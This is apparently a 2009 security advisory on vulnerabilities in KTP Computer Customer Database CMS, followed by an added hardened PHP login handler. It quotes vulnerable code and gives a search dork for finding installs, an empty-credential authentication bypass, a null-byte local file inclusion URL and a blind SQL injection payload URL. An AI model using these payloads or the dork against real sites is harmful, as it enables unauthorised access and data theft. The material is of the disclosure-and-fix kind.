Vulnerabilities in KTP Computer Customer Database CMS

Product: KTP Computer Customer Database CMS
Dork: "KTPCCD & KTPotG ©2008 Keith Thibodeaux"
Site: http://sourceforge.net/project/showfiles.php?group_id=245189
Found by: Dimi4
Date: 12.04.09

Auth bypass [pages/login.php]

Here is a rather clumsy function. It only checks the password:

PHP:
if ($_GET['a'] == "login") {
    $lname = $_POST['lname'];
    $lpass = md5($_POST['lpass']);
    // login name is interpolated into the query unescaped
    $q = mysql_query("SELECT * FROM techs WHERE tloginname = '$lname'");
    $result = mysql_fetch_array($q);
    // no check that a row was found; loose (==) comparison against the stored hash
    if ($lpass == $result['tloginpass']) {
        $_SESSION['tid'] = $result['tid'];
        $_SESSION['loggedin'] = "1";
        $_SESSION['tname'] = $result['tfname'] . " " . $result['tlname'];
        $lin = 1;
        $template->assign('name', $_SESSION['tname']);
        $template->assign('id', $_SESSION['tid']);
        $template->assign('func', "in");
        $template->display('login.tpl');
    } else {
        echo "login failed";
    }
}

Log in with an empty login and password.

Local File Include [index.php]

PHP:
if (isset($_GET['p'])) {
    // user-controlled path fragment is included without validation
    include 'pages/' . $_GET['p'] . '.php';
} else {
    include 'pages/index.php';
}

http://localhost/ktp/?p={PATH}%00

Blind SQL-inj [index.php]

PHP:
function gettech($tid) {
    // $tid is interpolated into the query unescaped
    if ($result = mysql_query("SELECT * FROM techs WHERE tid = '$tid'")) {
        $tech = mysql_fetch_array($result);
        return $tech;
    } else {
        echo mysql_error();
    }
}

http://localhost/ktp/?p=tech&a=vtech&tid=1'+and+substring(@@version,1,1)=[num]--

Full Path Disclosure [index.php]

Code:
http://localhost/ktp/pages/tech/changepassword.php
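A hardened form of the login handler, added here as an example and not part of the advisory or of the KTPCCD code: it binds the login name in a prepared statement (the same pattern fixes the `tid` query in gettech()), checks that a row was actually returned before comparing anything, and verifies the password with a constant-time check instead of a loose `==`. It assumes a PDO connection in `$db` and that `techs.tloginpass` has been migrated from bare md5 to `password_hash()` output; both are assumptions, the table and column names are the original ones.

```php
<?php
// Added example (not from the advisory or the KTPCCD source): hardened version
// of the pages/login.php handler. Assumes $db is a PDO connection and that
// techs.tloginpass now holds password_hash() output instead of a bare md5.
session_start();

function authenticate(PDO $db, string $lname, string $lpass): ?array
{
    // Prepared statement: the login name is bound, never interpolated,
    // so it cannot change the query (removes the SQL injection).
    $stmt = $db->prepare(
        'SELECT tid, tfname, tlname, tloginpass FROM techs WHERE tloginname = :lname'
    );
    $stmt->execute([':lname' => $lname]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Explicit "no such user" check: the original compared against a field
    // of a `false` result, which is what the auth bypass relies on.
    if ($row === false) {
        return null;
    }

    // Constant-time verification against the stored hash, no loose ==.
    if (!password_verify($lpass, $row['tloginpass'])) {
        return null;
    }
    return $row;
}

if (($_GET['a'] ?? '') === 'login') {
    $lname = $_POST['lname'] ?? '';
    $lpass = $_POST['lpass'] ?? '';

    // Reject empty credentials up front instead of letting them reach the DB.
    $tech = ($lname === '' || $lpass === '') ? null : authenticate($db, $lname, $lpass);

    if ($tech === null) {
        echo "login failed";
    } else {
        session_regenerate_id(true);          // fresh session id on privilege change
        $_SESSION['tid']      = $tech['tid'];
        $_SESSION['loggedin'] = "1";
        $_SESSION['tname']    = $tech['tfname'] . " " . $tech['tlname'];
        $template->assign('name', $_SESSION['tname']);
        $template->assign('id', $_SESSION['tid']);
        $template->assign('func', "in");
        $template->display('login.tpl');
    }
}
```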